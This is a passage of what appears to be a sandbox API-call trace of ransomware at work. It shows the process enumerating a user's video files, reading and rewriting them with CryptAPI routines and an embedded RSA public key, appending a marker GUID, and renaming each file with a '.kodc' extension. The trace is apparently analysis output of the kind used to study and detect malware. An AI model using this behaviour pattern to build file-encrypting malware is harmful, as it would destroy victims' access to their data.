dwFlags=0x0, lpMem=0x9bb7c68 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c610 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.370] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.371] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0x873a, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x873a, lpOverlapped=0x0) returned 1 [0100.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0100.371] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x873f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.371] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.371] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.371] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.372] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.372] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.372] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.372] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.372] CloseHandle (hObject=0x5cc) returned 1 [0100.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.373] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0100.373] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.373] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\oVsvZ7ftfd4dfii6-W7M.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ovsvz7ftfd4dfii6-w7m.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\oVsvZ7ftfd4dfii6-W7M.flv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ovsvz7ftfd4dfii6-w7m.flv.kodc")) returned 1 [0100.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.374] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.374] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.376] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8bbc1e0, ftCreationTime.dwHighDateTime=0x1d5bbca, ftLastAccessTime.dwLowDateTime=0xd551f920, ftLastAccessTime.dwHighDateTime=0x1d5c473, ftLastWriteTime.dwLowDateTime=0xd551f920, ftLastWriteTime.dwHighDateTime=0x1d5c473, nFileSizeHigh=0x0, nFileSizeLow=0x132c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pwBi 85Lt0LQRz0Na9iY.avi", cAlternateFileName="PWBI85~1.AVI")) returned 1 [0100.376] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.376] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.376] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.376] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pwBi 85Lt0LQRz0Na9iY.avi") returned=".avi" [0100.376] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pwBi 85Lt0LQRz0Na9iY.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pwbi 85lt0lqrz0na9iy.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.376] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=78534) returned 1 [0100.377] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.380] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x132a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.381] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.382] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.382] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.382] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.382] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x132c6, lpOverlapped=0x0) returned 1 [0100.383] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.383] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.383] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.383] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.383] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.384] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.384] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.384] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.384] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.384] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.384] GetLastError () returned 0x0 [0100.384] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.384] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.384] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.384] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.384] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.384] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.385] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x132d0) returned 0x9bb8968 [0100.385] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.385] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c610 [0100.385] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c68 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c658 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c80 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cb0 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cc8 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.386] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cb0 | out: hHeap=0x630000) returned 1 [0100.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cc8 | out: hHeap=0x630000) returned 1 [0100.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.386] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7cc8 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7cb0 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.386] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0100.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0100.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cc8 | out: hHeap=0x630000) returned 1 [0100.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cb0 | out: hHeap=0x630000) returned 1 [0100.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.387] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.387] GetCurrentThreadId () returned 0x42c [0100.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6b78 [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.388] GetCurrentThreadId () returned 0x42c [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.388] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cb0 [0100.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.389] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cc8 [0100.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c98 [0100.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ce0 [0100.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0100.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7cb0 | out: hHeap=0x630000) returned 1 [0100.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7cb0 [0100.390] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.391] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x132c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.391] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.391] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.391] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.392] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.392] CloseHandle (hObject=0x5cc) returned 1 [0100.393] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pwBi 85Lt0LQRz0Na9iY.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pwbi 85lt0lqrz0na9iy.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\pwBi 85Lt0LQRz0Na9iY.avi.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pwbi 85lt0lqrz0na9iy.avi.kodc")) returned 1 [0100.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.395] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.395] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.397] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34bb0de0, ftCreationTime.dwHighDateTime=0x1d5b748, ftLastAccessTime.dwLowDateTime=0x70c0e4b0, ftLastAccessTime.dwHighDateTime=0x1d5b656, ftLastWriteTime.dwLowDateTime=0x70c0e4b0, ftLastWriteTime.dwHighDateTime=0x1d5b656, nFileSizeHigh=0x0, nFileSizeLow=0x18523, 